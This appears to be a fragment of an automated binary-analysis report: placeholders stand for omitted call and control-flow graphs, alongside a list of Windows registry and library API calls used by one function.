[Interactive callgraph rendering omitted. Legend: Executed, Not Executed, Opacity -> Relevance, Disassembly available. The graph lists functions Function_00007FF7E74F1008 through Function_00007FF7E74F8E20 and their call edges; the node/edge serialization is not reproduced here.]

Control-flow Graph

[Interactive control-flow graph rendering omitted. Legend: Executed, Not Executed. The graph covers the function starting at 7ff7e74f41b4; recoverable API references in its basic blocks: memset, CompareStringA, LocalFree, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, GetSystemDirectoryA, RegSetValueExA, GetProcAddress, FreeLibrary.]

APIs